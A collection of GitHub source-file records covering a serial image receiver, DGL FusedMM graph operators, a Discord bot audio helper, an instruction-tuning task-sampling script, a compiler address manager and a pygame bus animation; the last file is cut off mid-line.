{"seq_id":"20544134332","text":"import serial\nfrom PIL import Image\n#import IO\nbaud = 57600\nbytesize = serial.EIGHTBITS\nstopbits = serial.STOPBITS_ONE\nparitybits = serial.PARITY_NONE\nport = \"COM3\"\n\nbytelist = []\n\n\nser = serial.Serial(port = port, baudrate = baud, bytesize = bytesize, stopbits = stopbits, parity = paritybits)\ndone = False\ni = 0\nwhile not done:\n \n # append each 32-byte chunk; indexing into the empty list raised IndexError before\n bytelist.append(ser.read(32))\n print(bytelist[i])\n i += 1\n # NOTE: 'done' is never set to True, so this loop runs until interrupted\n \n\nser.close()\n\n","repo_name":"AaravMohanty/SUAS","sub_path":"recieveImage.py","file_name":"recieveImage.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"}
{"seq_id":"14863629109","text":"\"\"\"dgl fusedmm operator module.\"\"\"\nimport sys\nfrom itertools import product\nfrom ..backend import gfusedmm as gfusedmm_internal\nfrom .. 
import backend as F\n\n__all__ = ['gfusedmm', 'fused_cpy_u', 'u_fmul_e_sum']\n\n# this operations are borrowed from spmm's\ndef reshape_lhs_rhs(lhs_data, rhs_data):\n r\"\"\" Expand dims so that there will be no broadcasting issues with different\n number of dimensions. For example, given two shapes (N, 3, 1), (E, 5, 3, 4)\n that are valid broadcastable shapes, change them to (N, 1, 3, 1) and\n (E, 5, 3, 4)\n Parameters\n ----------\n lhs_data : tensor or None\n The left operand, could be None if it's not required by op.\n rhs_data : tensor or None\n The right operand, could be None if it's not required by op.\n \"\"\"\n lhs_shape = F.shape(lhs_data)\n rhs_shape = F.shape(rhs_data)\n if len(lhs_shape) != len(rhs_shape):\n max_ndims = max(len(lhs_shape), len(rhs_shape))\n lhs_pad_ndims = max_ndims - len(lhs_shape)\n rhs_pad_ndims = max_ndims - len(rhs_shape)\n new_lhs_shape = (lhs_shape[0],) + (1,) * lhs_pad_ndims + lhs_shape[1:]\n new_rhs_shape = (rhs_shape[0],) + (1,) * rhs_pad_ndims + rhs_shape[1:]\n lhs_data = F.reshape(lhs_data, new_lhs_shape)\n rhs_data = F.reshape(rhs_data, new_rhs_shape)\n return lhs_data, rhs_data\n\n\ndef gfusedmm(g, op, reduce_op, lhs_data, rhs_data):\n r\"\"\" Generalized FUSEDMM.\n It computes edge features by :attr:`op` lhs features and rhs features.\n \n Parameters\n ----------\n g : DGLGraph\n The input graph.\n op : str\n The binary op's name, could be ``add``, ``sub``, ``mul``, ``div``,\n ``copy_lhs``, ``copy_rhs``.\n reduce_op : str\n Reduce operator, could be ``sum``, ``max``, ``min``, ``mean``.\n lhs_data : tensor or None\n The left operand, could be None if it's not required by the op.\n rhs_data : tensor or None\n The right operand, could be None if it's not required by the op.\n\n Returns\n -------\n tensor\n \n\tThe result tensor.\n \"\"\"\n if g._graph.number_of_etypes() == 1:\n if op not in ['fused_cpy_lhs', 'fused_cpy_rhs']:\n lhs_data, rhs_data = reshape_lhs_rhs(lhs_data, rhs_data)\n return gfusedmm_internal(\n g._graph, op, 'sum' if reduce_op == 'mean' else reduce_op, lhs_data, rhs_data)\n else:\n print(\"Hetero-graph not supported!\")\n return None\n\ndef _gen_copy_reduce_func(binary_op, reduce_op):\n\n name = \"{}_{}\".format(binary_op, reduce_op)\n binary_str = {\n \"fused_cpy_u\": \"It copies node feature to edge as the message.\",\n 'fused_cpy_e': \"It regards edge feature as message.\"\n }\n x_str = {\n \"fused_cpy_u\": \"source node\",\n \"fused_cpy_e\": \"edge\"\n }\n def func(g, x):\n if binary_op == 'fused_cpy_u':\n return gfusedmm(g, 'fused_cpy_lhs', reduce_op, x, None)\n elif binary_op == 'u_fmul_e_sum':\n return gfusedmm(g, 'u_fmul_e_sum', reduce_op, x, None)\n else:\n return gfusedmm(g, 'fused_cpy_rhs', reduce_op, None, x)\n\n func.__name__ = name\n #print(\"python/dgl/ops/spmm...\", name)\n #func.__doc__ = docstring(binary_op)\n return func\n\ndef fused_cpy_u(g, x):\n r\"\"\"Generalized FusedMM function that copies source node features to edges.\n\n Parameters\n ----------\n g : DGLHeteroGraph\n The input graph.\n x : tensor\n The source node features.\n\n Returns\n -------\n tensor\n The result tensor.\n\n Notes\n -----\n This function supports autograd (computing input gradients given the output gradient).\n \"\"\"\n return gfusedmm(g, 'fused_cpy_lhs', None, x, None)\n\ndef u_fmul_e_sum(g, x):\n r\"\"\"Generalized FusedMM function that copies source node features to edges.\n\n Parameters\n ----------\n g : DGLHeteroGraph\n The input graph.\n x : tensor\n The source node features.\n\n Returns\n -------\n tensor\n The result 
tensor.\n\n Notes\n -----\n This function supports autograd (computing input gradients given the output gradient).\n \"\"\"\n return gfusedmm(g, 'u_fmul_e_sum', None, x, None)\n\n\ndef _gen_fusedmm_func(binary_op, reduce_op):\n name = \"u_{}_e_{}\".format(binary_op, reduce_op)\n docstring = r\"\"\"Generalized FUSEDMM function.\n It computes edge features by {} features and {} features.\n Parameters\n ----------\n g : DGLHeteroGraph\n The input graph\n x : tensor\n The lhs features.\n y : tensor\n The rhs features.\n Returns\n -------\n tensor\n The result tensor.\n Notes\n -----\n This function supports autograd (computing input gradients given the output gradient). If the\n feature shapes of the two input operands do not match, we first broadcast the features to a unified\n shape (note that the memory usage will not increase accordingly) and then perform the operation.\n Broadcasting follows NumPy semantics. Please see\n https://docs.scipy.org/doc/numpy/user/basics.broadcasting.html\n for more details about the NumPy broadcasting semantics.\n \"\"\".format(binary_op, reduce_op)\n # print(\"registering fusedmm function:\", name)\n def func(g, x, y):\n return gfusedmm(g, binary_op, reduce_op, x, y)\n func.__name__ = name\n # func.__doc__ = docstring\n return func\n\ndef _register_fusedmm_func():\n \"\"\"Register fusedmm functions\n\n - Binary operation plus reduction between u and e: u_[]_e_[]\n - Copy u plus reduction: copy_u_[]\n - Copy e plus reduction: copy_e_[]\n \"\"\"\n for binary_op in [\"fsub\", \"fdiv\", \"fmul\", \"fadd\", \"fused_cpy_u\", \"fused_cpy_e\"]:\n for reduce_op in [\"sum\", \"max\", \"min\", \"mean\", \"fdot\"]:\n if binary_op.startswith(\"fused_cpy\"):\n func = _gen_copy_reduce_func(binary_op, reduce_op)\n else:\n func = _gen_fusedmm_func(binary_op, reduce_op)\n setattr(sys.modules[__name__], func.__name__, func)\n __all__.append(func.__name__)\n\n_register_fusedmm_func()\n","repo_name":"khaled-rahman/FusedMM4DGL","sub_path":"python/dgl/ops/fusedmm.py","file_name":"fusedmm.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
{"seq_id":"43538222194","text":"# link to the task:\n# https://www.codewars.com/users/Krzys194/completed_solutions\n \ndef hotpo(n):\n i = 0\n while n > 1:\n if n % 2 == 0:\n n //= 2\n i += 1\n else:\n n = 3 * n + 1\n i += 1\n return i\n\nhotpo(23)","repo_name":"krzys194/CodeWars","sub_path":"CollatzConjecture(8kyu).py","file_name":"CollatzConjecture(8kyu).py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
{"seq_id":"25513454772","text":"from BotGlobals import BACK_BOT, RARITY_COLORS\nfrom .embedHelpers import back_embed\nimport discord\nimport discord.opus as opus\nimport asyncio\nfrom os.path import split\n\nasync def nil_corout():\n return\n\nasync def play_opus_audio_to_channel_then_leave(message, opus_filename,\\\n failure_coroutine = nil_corout,\n back_bot = BACK_BOT,\n rarity_colors = RARITY_COLORS,\n give_loot = True):\n \"\"\"\n Plays a .opus audio file through the bot.\n\n The bot will join the channel of the Member associated with the message if\n possible. Then, it will play the audio file.\n\n If there is a failure for whatever reason, the failure_coroutine will run\n with no arguments. 
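(For example, a caller might pass an async function that posts a fallback\n text message instead; which coroutine to use is up to the caller.) 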
Most errors will be raised afterward.\n\n \"\"\"\n channel = message.author.voice.channel\n if(opus.is_loaded() and isinstance(message.author, discord.Member)\\\n and channel != None):\n print(opus_filename)\n #Move to the correct voice channel\n\n # if(back_bot.is_voice_connected(message.author.server)):\n # voice_client = back_bot.voice_client_in(message.author.server)\n # await voice_client.disconnect()\n try:\n voice_client = await channel.connect()\n def disconnect_from_vc(*args):\n dc_fut = asyncio.run_coroutine_threadsafe(voice_client.disconnect(), back_bot.loop)\n try:\n dc_fut.result()\n except:\n dc_fut.cancel()\n\n #Play the audio, then disconnect\n try:\n\n voice_client.play(discord.FFmpegPCMAudio(opus_filename), after = disconnect_from_vc)\n\n\n except Exception as e:\n print(\"Back out! Couldn't play the audio!\", e)\n await asyncio.wait_for(voice_client.disconnect(), 10)\n await failure_coroutine()\n raise e\n\n except discord.errors.ConnectionClosed as cE:\n print(\"There's a connection backup!\", cE)\n return\n\n except Exception as e:\n print(\"Hang back! No audio play!\")\n await failure_coroutine()\n raise e\n\n head, clip = split(opus_filename)\n base, rarity = split(head)\n em = back_embed(clip, rarity, rarity_colors, back_bot, message.author.name)\n await message.channel.send(embed=em)\n if(give_loot):\n back_bot.lootTracker(message.author, rarity, clip)\n\n else:\n await failure_coroutine()\n #EXIT\n","repo_name":"pillig/back-bot","sub_path":"HelperFunctions/asyncFunctions.py","file_name":"asyncFunctions.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10413368514","text":"import unittest\nfrom shapely import prepared\nfrom shapely import geometry\n\n\nclass PreparedGeometryTestCase(unittest.TestCase):\n \n def test_prepared(self):\n p = prepared.PreparedGeometry(geometry.Point(0.0, 0.0))\n\n\ndef test_suite():\n return unittest.TestLoader().loadTestsFromTestCase(\n PreparedGeometryTestCase\n )\n","repo_name":"BertrandGervais/shapely","sub_path":"shapely/tests/test_prepared.py","file_name":"test_prepared.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"20516209439","text":"from src.variables import vars as v \n\n## v.variable_name\n## Config variables in .src/variables.py\n\nclass config:\n \n FILE=\"paraadads.txt\" ## FILE NAME + EXTENSION || example.txt || or other extension\n OS_ALIAS=\"my os aliases\"\n \nclass message:\n TEXT = f\"\"\"\n Hi1\n HI + 2\n Hi 3 _\n Example 1 2 3 {v.variable1}\n {v.variable2}\n {v.variable3}\n {v.variable4}\n {v.variable5}\n {v.variable6}\n \"\"\" \n\nclass options:\n \n history = False\n os_aliases = True\n","repo_name":"iSebDev/filewriter-python","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"24322645519","text":"import os \nos.environ['MKL_THREADING_LAYER'] = \"GNU\"\nimport argparse\nimport numpy as np\nimport shutil\n\ndef main(args):\n task_list = np.arange(args.num_tasks)\n task_list = [str(task) for task in task_list]\n\n target_tasks = args.target_tasks\n other_tasks = [task for task in task_list if task not in target_tasks]\n\n num_samples = args.num_samples\n max_task_num = args.max_task_num\n min_task_num = args.min_task_num\n for _ in range(num_samples):\n # create a set of 
trained task combinations\n sampled_task_dir = os.path.join(\"./sampled_tasks\", \"{}.txt\".format(args.task_set_name))\n if not os.path.exists(sampled_task_dir):\n f = open(sampled_task_dir, \"w\")\n f.close()\n \n with open(sampled_task_dir, \"r\") as f:\n sampled_tasks = set()\n for line in f.readlines():\n sampled_tasks.add(line.rstrip(\"\\n\"))\n # print(sampled_tasks)\n\n # train on a new task combination\n with open(sampled_task_dir, \"a\") as f:\n if len(target_tasks) == 0:\n tmp_other_task_num = np.random.randint(\n low=min_task_num, \n high=max_task_num+1\n )\n tmp_sampled_other_tasks = np.random.choice(other_tasks, size=tmp_other_task_num,replace=False)\n \n tmp_sampled_tasks = tmp_sampled_other_tasks\n tmp_sampled_tasks.sort()\n tmp_sampled_tasks = \" \".join(tmp_sampled_tasks)\n else:\n tmp_target_task_num = np.random.randint(low=1, high=len(target_tasks)+1)\n tmp_sampled_target_tasks = np.random.choice(target_tasks, size=tmp_target_task_num, replace=False)\n\n tmp_other_task_num = np.random.randint(\n low=max(min_task_num-tmp_target_task_num, 0), \n high=max_task_num-tmp_target_task_num+1\n )\n tmp_sampled_other_tasks = np.random.choice(other_tasks, size=tmp_other_task_num,replace=False)\n \n tmp_sampled_tasks = np.concatenate([tmp_sampled_target_tasks, tmp_sampled_other_tasks])\n tmp_sampled_tasks.sort()\n tmp_sampled_tasks = \" \".join(tmp_sampled_tasks)\n \n if tmp_sampled_tasks in sampled_tasks:\n continue\n print(tmp_sampled_tasks)\n \n os.system(\"CUDA_VISIBLE_DEVICES={} python train_multi_instruction_v3.py \\\n --do_train \\\n --do_eval \\\n --predict_with_generate \\\n --model_name_or_path {} \\\n --max_source_length 512 \\\n --max_target_length 128 \\\n --pad_to_max_length True \\\n --generation_max_length 128 \\\n --data_dir data/splits/default \\\n --task_dir data/tasks \\\n --overwrite_output_dir \\\n --cache_dir ./cache/ \\\n --overwrite_cache \\\n --per_device_train_batch_size 8 \\\n --per_device_eval_batch_size 8 \\\n --gradient_accumulation_steps 1 \\\n --learning_rate {} \\\n --lr_scheduler_type constant \\\n --max_steps {} \\\n --warmup_steps 0 \\\n --logging_strategy steps \\\n --logging_steps 500 \\\n --evaluation_strategy steps \\\n --eval_steps {} \\\n --save_strategy steps \\\n --save_steps {} \\\n --metric_for_best_model eval_exact_match\\\n --greater_is_better True \\\n --downsample {} \\\n --task_name {} \\\n --template_idx {} \\\n --output_dir saved/ \\\n --load_best_model_at_end \\\n --disable_tqdm True \\\n --runs {}\\\n --save_name {}\".format(\n args.device, args.model_name_or_path, args.lr, args.max_steps, args.eval_steps, args.save_steps,\n args.downsample, args.dataset, tmp_sampled_tasks, args.runs, args.save_name\n ))\n instruction_idxs = \"[\" + \", \".join(tmp_sampled_tasks.split(\" \")) + \"]\"\n output_dir = os.path.join(\"saved\", \"{}_{}_{}\".format(args.dataset, instruction_idxs, args.model_name_or_path))\n # delete the output_dir\n if os.path.exists(output_dir):\n shutil.rmtree(output_dir)\n\n sampled_tasks.add(tmp_sampled_tasks)\n f.write(tmp_sampled_tasks + \"\\n\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--num_tasks\", type=int, default=10)\n parser.add_argument(\"--target_tasks\", nargs='+', type=str, default=[])\n\n parser.add_argument(\"--model_name_or_path\", type=str, default=\"t5-base\")\n parser.add_argument(\"--num_samples\", type=int, default=1)\n parser.add_argument(\"--min_task_num\", type=int, default=3)\n parser.add_argument(\"--max_task_num\", type=int, 
default=3)\n\n parser.add_argument(\"--dataset\", type=str, default=\"rte\")\n parser.add_argument(\"--device\", type=int, default=0)\n parser.add_argument(\"--lr\", type=float, default=5e-5)\n parser.add_argument(\"--max_steps\", type=int, default=5000)\n parser.add_argument(\"--eval_steps\", type=int, default=500)\n parser.add_argument(\"--save_steps\", type=int, default=500)\n parser.add_argument(\"--downsample\", type=int, default=500)\n parser.add_argument(\"--runs\", type=int, default=3)\n\n parser.add_argument(\"--task_set_name\", type=str, default=\"sampled_tasks\")\n parser.add_argument(\"--save_name\", type=str, default=\"sampled_tasks\")\n\n args = parser.parse_args()\n main(args)","repo_name":"anonymous-researchcode/Task-Grouping-For-Instruction-Tuning","sub_path":"train_sample_instructions.py","file_name":"train_sample_instructions.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"2810753182","text":"from errorHandler import errorHandler\n\nclass addressManager():\n\tdef __init__(self):\n\n\t\tself.errorHandler = errorHandler()\n\n\t\t#------------------------------------------------------\n\t\t# \tSTATIC ADDRESSES\n\t\t#------------------------------------------------------\n\t\tself.MEMORY_BEGIN = 1000\n\t\tself.MEMORY_END = 32999\n\n\t\tself.BEGIN_GLOBALS = 1000\n\t\tself.GLOBALS_INT = 1000\n\t\tself.GLOBALS_FLOAT = 3000\n\t\tself.GLOBALS_BOOLEAN = 5000\n\t\tself.GLOBALS_STRING = 7000\n\t\tself.GLOBALS_OBJECT = 9000\n\t\tself.END_GLOBALS = 10999\n\n\t\tself.BEGIN_LOCALS = 11000\n\t\tself.LOCALS_INT = 11000\n\t\tself.LOCALS_FLOAT = 13000\n\t\tself.LOCALS_BOOLEAN = 15000\n\t\tself.LOCALS_STRING = 17000\n\t\tself.LOCALS_OBJECT = 19000\n\t\tself.END_LOCALS = 20999\n\n\t\tself.BEGIN_TEMPORALS = 21000\n\t\tself.TEMPORALS_INT = 23000\n\t\tself.TEMPORALS_FLOAT = 25000\n\t\tself.TEMPORALS_BOOLEAN = 27000\n\t\tself.TEMPORALS_STRING = 29000\n\t\tself.TEMPORALS_OBJECT = 31000\n\t\tself.END_TEMPORALS = 32999\n\n\t\t#--------------------------------------------------------\n\t\t#\tCOUNTER ADDRESSES\n\t\t#--------------------------------------------------------\n\t\tself.COUNTER_GLOBALS_INT = self.GLOBALS_INT\n\t\tself.COUNTER_GLOBALS_FLOAT = self.GLOBALS_FLOAT\n\t\tself.COUNTER_GLOBALS_BOOLEAN = self.GLOBALS_BOOLEAN\n\t\tself.COUNTER_GLOBALS_STRING = self.GLOBALS_STRING\n\t\tself.COUNTER_GLOBALS_OBJECT = self.GLOBALS_OBJECT\n\n\t\tself.COUNTER_LOCALS_INT = self.LOCALS_INT\n\t\tself.COUNTER_LOCALS_FLOAT = self.LOCALS_FLOAT\n\t\tself.COUNTER_LOCALS_BOOLEAN = self.LOCALS_BOOLEAN\n\t\tself.COUNTER_LOCALS_STRING = self.LOCALS_STRING\n\t\tself.COUNTER_LOCALS_OBJECT = self.LOCALS_OBJECT\n\n\t\tself.COUNTER_TEMPORALS_INT = self.TEMPORALS_INT\n\t\tself.COUNTER_TEMPORALS_FLOAT = self.TEMPORALS_FLOAT\n\t\tself.COUNTER_TEMPORALS_BOOLEAN = self.TEMPORALS_BOOLEAN\n\t\tself.COUNTER_TEMPORALS_STRING = self.TEMPORALS_STRING\n\t\tself.COUNTER_TEMPORALS_OBJECT = self.TEMPORALS_OBJECT\n\n\t# Method that, given an address, returns which memory segment it belongs to\n\tdef getMemorySegment(self, stringAddress):\n\t\t# Parse address to int\n\t\taddress = int(stringAddress)\n\n\t\t# Context and varType variables\n\t\tcontext = \"NoContext\"\n\t\tvarType = \"NoType\"\n\n\t\tif self.BEGIN_GLOBALS <= address <= self.END_GLOBALS:\n\t\t\tcontext = \"global\"\n\t\t\tif self.GLOBALS_INT <= address < self.GLOBALS_FLOAT:\n\t\t\t\tvarType = \"int\"\n\t\t\telif self.GLOBALS_FLOAT <= address < self.GLOBALS_BOOLEAN:\n\t\t\t\tvarType = \"float\"\n\t\t\telif self.GLOBALS_BOOLEAN <= address < self.GLOBALS_STRING:\n\t\t\t\tvarType = \"boolean\"\n\t\t\telif self.GLOBALS_STRING <= address < self.GLOBALS_OBJECT:\n\t\t\t\tvarType = \"string\"\n\t\t\telif self.GLOBALS_OBJECT <= address <= self.END_GLOBALS:\n\t\t\t\tvarType = \"obj\"\n\t\telif self.BEGIN_LOCALS <= address <= self.END_LOCALS:\n\t\t\tcontext = \"local\"\n\t\t\tif self.LOCALS_INT <= address < self.LOCALS_FLOAT:\n\t\t\t\tvarType = \"int\"\n\t\t\telif self.LOCALS_FLOAT <= address < self.LOCALS_BOOLEAN:\n\t\t\t\tvarType = \"float\"\n\t\t\telif self.LOCALS_BOOLEAN <= address < self.LOCALS_STRING:\n\t\t\t\tvarType = \"boolean\"\n\t\t\telif self.LOCALS_STRING <= address < self.LOCALS_OBJECT:\n\t\t\t\tvarType = \"string\"\n\t\t\telif self.LOCALS_OBJECT <= address <= self.END_LOCALS:\n\t\t\t\tvarType = \"obj\"\n\t\telif self.BEGIN_TEMPORALS <= address <= self.END_TEMPORALS:\n\t\t\tcontext = \"temporal\"\n\t\t\tif self.TEMPORALS_INT <= address < self.TEMPORALS_FLOAT:\n\t\t\t\tvarType = \"int\"\n\t\t\telif self.TEMPORALS_FLOAT <= address < self.TEMPORALS_BOOLEAN:\n\t\t\t\tvarType = \"float\"\n\t\t\telif self.TEMPORALS_BOOLEAN <= address < self.TEMPORALS_STRING:\n\t\t\t\tvarType = \"boolean\"\n\t\t\telif self.TEMPORALS_STRING <= address < self.TEMPORALS_OBJECT:\n\t\t\t\tvarType = \"string\"\n\t\t\telif self.TEMPORALS_OBJECT <= address <= self.END_TEMPORALS:\n\t\t\t\tvarType = \"obj\"\n\t\telse:\n\t\t\tself.errorHandler.definition(self.errorHandler.INVALID_MEMORY_ACCESS, stringAddress, None)\n\n\t\tmemorySegment = [context, varType]\n\t\treturn memorySegment\n\t\t\t\n\t#Method that returns the virtual address available\n\tdef getVirtualAddress(self, data_Type, scope):\n\t\tif scope == \"temporal\":\n\t\t\tif data_Type == \"int\":\n\t\t\t\treturn self.COUNTER_TEMPORALS_INT\n\t\t\telif data_Type == \"float\":\n\t\t\t\treturn self.COUNTER_TEMPORALS_FLOAT\n\t\t\telif data_Type == \"bool\":\n\t\t\t\treturn self.COUNTER_TEMPORALS_BOOLEAN\n\t\t\telif data_Type == \"string\":\n\t\t\t\treturn self.COUNTER_TEMPORALS_STRING\n\t\t\telif data_Type == \"obj\":\n\t\t\t\treturn self.COUNTER_TEMPORALS_OBJECT\n\t\telif scope == \"local\":\n\t\t\tif data_Type == \"int\":\n\t\t\t\treturn self.COUNTER_LOCALS_INT\n\t\t\telif data_Type == \"float\":\n\t\t\t\treturn self.COUNTER_LOCALS_FLOAT\n\t\t\telif data_Type == \"bool\":\n\t\t\t\treturn self.COUNTER_LOCALS_BOOLEAN\n\t\t\telif data_Type == \"string\":\n\t\t\t\treturn self.COUNTER_LOCALS_STRING\n\t\t\telif data_Type == \"obj\":\n\t\t\t\treturn self.COUNTER_LOCALS_OBJECT\n\t\telif scope == \"global\":\n\t\t\tif data_Type == \"int\":\n\t\t\t\treturn self.COUNTER_GLOBALS_INT\n\t\t\telif data_Type == \"float\":\n\t\t\t\treturn self.COUNTER_GLOBALS_FLOAT\n\t\t\telif data_Type == \"bool\":\n\t\t\t\treturn self.COUNTER_GLOBALS_BOOLEAN\n\t\t\telif data_Type == \"string\":\n\t\t\t\treturn self.COUNTER_GLOBALS_STRING\n\t\t\telif data_Type == \"obj\":\n\t\t\t\treturn self.COUNTER_GLOBALS_OBJECT\n\t\n\t#Method that updates the virtual addresses\n\tdef updateVirtualAddress(self, data_Type, scope, size=1):\n\t\tif scope == \"temporal\":\n\t\t\tif data_Type == \"int\":\n\t\t\t\tself.COUNTER_TEMPORALS_INT += size\n\t\t\telif data_Type == \"float\":\n\t\t\t\tself.COUNTER_TEMPORALS_FLOAT += size\n\t\t\telif data_Type == \"bool\":\n\t\t\t\tself.COUNTER_TEMPORALS_BOOLEAN += size\n\t\t\telif data_Type == \"string\":\n\t\t\t\tself.COUNTER_TEMPORALS_STRING += size\n\t\telif scope == \"local\":\n\t\t\tif data_Type == \"int\":\n\t\t\t\tself.COUNTER_LOCALS_INT += size\n\t\t\telif data_Type == \"float\":\n\t\t\t\tself.COUNTER_LOCALS_FLOAT += size\n\t\t\telif data_Type == \"bool\":\n\t\t\t\tself.COUNTER_LOCALS_BOOLEAN += size\n\t\t\telif data_Type == \"string\":\n\t\t\t\tself.COUNTER_LOCALS_STRING += size\n\t\telif scope == \"global\":\n\t\t\tif data_Type == \"int\":\n\t\t\t\tself.COUNTER_GLOBALS_INT += size\n\t\t\telif data_Type == \"float\":\n\t\t\t\tself.COUNTER_GLOBALS_FLOAT += size\n\t\t\telif data_Type == \"bool\":\n\t\t\t\tself.COUNTER_GLOBALS_BOOLEAN += size\n\t\t\telif data_Type == \"string\":\n\t\t\t\tself.COUNTER_GLOBALS_STRING += size\n\n\t# Method that returns type of operator\n\tdef typeOfOperator(self, operator):\n\t\ttypeOperator = \"NoType\"\n\n\t\tassignmentOperators = [\"=\"]\n\t\tarithmeticOperators = [\"+\", \"-\", \"*\", \"/\"]\n\t\trelationalOperators = [\">\", \">=\", \"<\", \"<=\", \"==\", \"!=\"]\n\t\tlogicalOperators = [\"&&\", \"||\"]\n\n\t\tif operator in assignmentOperators:\n\t\t\ttypeOperator = \"assignment\"\n\t\telif operator in arithmeticOperators:\n\t\t\ttypeOperator = \"arithmetic\"\n\t\telif operator in relationalOperators:\n\t\t\ttypeOperator = \"relational\"\n\t\telif operator in logicalOperators:\n\t\t\ttypeOperator = \"logical\"\n\n\t\treturn typeOperator\n\n\t#Method that restarts the counters for the local and temporal addresses \n\t# every time it enters a new function \n\tdef restartVirtualAddress(self):\n\t\tself.COUNTER_TEMPORALS_INT = self.TEMPORALS_INT\n\t\tself.COUNTER_TEMPORALS_FLOAT = self.TEMPORALS_FLOAT\n\t\tself.COUNTER_TEMPORALS_BOOLEAN = self.TEMPORALS_BOOLEAN\n\t\tself.COUNTER_TEMPORALS_STRING = self.TEMPORALS_STRING\n\t\tself.COUNTER_TEMPORALS_OBJECT = self.TEMPORALS_OBJECT\n\t\tself.COUNTER_LOCALS_INT = self.LOCALS_INT\n\t\tself.COUNTER_LOCALS_FLOAT = self.LOCALS_FLOAT\n\t\tself.COUNTER_LOCALS_BOOLEAN = self.LOCALS_BOOLEAN\n\t\tself.COUNTER_LOCALS_STRING = self.LOCALS_STRING\n\t\tself.COUNTER_LOCALS_OBJECT = self.LOCALS_OBJECT","repo_name":"CharlieBradbury/One-For-All","sub_path":"addressManager.py","file_name":"addressManager.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"14530905791","text":"# Воробьев Даниил ИУ7-21Б\r\n\r\nimport pygame\r\nfrom math import *\r\n\r\n# Create the window\r\nwindow = pygame.display.set_mode((900, 500))\r\nscreen = pygame.Surface((900, 500))\r\nroad = pygame.Surface((900, 100))\r\npygame.display.set_caption(\"4 laba\")\r\n\r\n# Colors\r\nasphalt = (90,90,90)\r\nsky = (135, 206, 235)\r\nred = (255, 0, 0)\r\ngreen = (34, 139, 34)\r\nblack = (0,0,0)\r\ngrey = (192, 192, 192)\r\nman = (255, 127, 80)\r\nwhite = (255, 255, 255)\r\nblue = (0, 0, 255)\r\nbrown = (102, 53, 0)\r\n\r\n# Variables for the bus movement\r\nwheel1_x = -2000\r\nwheel1_y = 385\r\nwheel1_change = 5\r\nangle = 3.14\r\nangle1 = 1.57\r\nx = wheel1_x - 10\r\ny = wheel1_y\r\nx1 = wheel1_x\r\ny1 = wheel1_y - 10\r\n\r\n# Variables for the passenger movement\r\npas_x = 1000\r\npas_y = 380\r\npas_change = 1\r\nfoot = 2\r\ni = 0\r\ntime = 0\r\ntime2 = 0\r\n\r\nrun = True\r\nwhile run:\r\n    # Check for program exit\r\n    for event in pygame.event.get():\r\n        if event.type == pygame.QUIT:\r\n            run = False\r\n    screen.fill(sky)\r\n    road.fill(asphalt)\r\n\r\n    # Update the wheel positions\r\n    if wheel1_x < 540 or time > 100:\r\n        x = wheel1_x + 10*cos(angle)\r\n        y = wheel1_y + 10*sin(angle)\r\n        x1 = wheel1_x + 10*cos(angle1)\r\n        y1 = wheel1_y + 10*sin(angle1)\r\n        angle+=0.095\r\n        angle1+=0.095\r\n\r\n    # Draw the clouds\r\n    pygame.draw.rect(screen, white, [280,90,60,40])\r\n    pygame.draw.circle(screen, white,[280,110],20 )\r\n    pygame.draw.circle(screen, white, [340,105],25)\r\n    pygame.draw.circle(screen, white, [300,90],17)\r\n    pygame.draw.circle(screen, white, [325,80],20)\r\n    pygame.draw.rect(screen, white, [640,110,60,40])\r\n    pygame.draw.circle(screen, white,[640,130],20 )\r\n    pygame.draw.circle(screen, white, [700,125],25)\r\n    pygame.draw.circle(screen, white, [660,110],17)\r\n    pygame.draw.circle(screen, white, [685,100],20)\r\n\r\n    # The bus stop\r\n    pygame.draw.rect(screen, black, (550, 335 , 100, 75), 6)\r\n    pygame.draw.rect(screen, green, (553, 338 , 94, 63))\r\n    pygame.draw.rect(screen, white, (670, 338 , 20, 10))\r\n    pygame.draw.rect(screen, black, (667, 338 , 23, 13),6)\r\n    pygame.draw.line(screen, black, (677, 348), (677, 400), 6)\r\n\r\n    # The passenger walks to the bus stop\r\n    if foot % 64 == 0:\r\n        i = 3\r\n    else:\r\n        if foot % 32 == 0:\r\n            i = 0\r\n    \r\n    if time < 100:\r\n        # The passenger walks to the bus stop\r\n        pygame.draw.line(screen, blue, (int(pas_x), int(pas_y)), (pas_x + 5 - i, pas_y + 20), 3)\r\n        pygame.draw.line(screen, blue, (pas_x, pas_y), (pas_x - 5 + i, pas_y + 20), 3)\r\n        pygame.draw.line(screen, brown, (pas_x, pas_y), (pas_x, pas_y - 20), 3)\r\n        pygame.draw.line(screen, brown, (pas_x, pas_y - 20), (pas_x + 5, pas_y), 3)\r\n        pygame.draw.line(screen, brown, (pas_x, pas_y - 20), (pas_x - 5, pas_y), 3)\r\n        pygame.draw.circle(screen, man, (int(pas_x), 352), 8)\r\n        pygame.draw.circle(screen, black, (int(pas_x) - 5, 352), 1)\r\n        pygame.draw.line(screen, red, (pas_x - 2, 356), (pas_x - 4, 356), 1)\r\n    else:\r\n        # The passenger is on the bus\r\n        pygame.draw.circle(screen, man, (int(wheel1_x) + 60, 340), 8)\r\n        pygame.draw.circle(screen, black, (int(wheel1_x) + 60 - 5, 340), 1)\r\n        pygame.draw.line(screen, red, (wheel1_x + 60 - 2, 344), (wheel1_x + 60 - 4, 344), 1)\r\n        pygame.draw.line(screen, brown, (wheel1_x + 60, pas_y - 20), (wheel1_x + 60, pas_y - 33), 3)\r\n        pygame.draw.line(screen, brown, (wheel1_x + 60 - 10, 355), (wheel1_x + 60, 348), 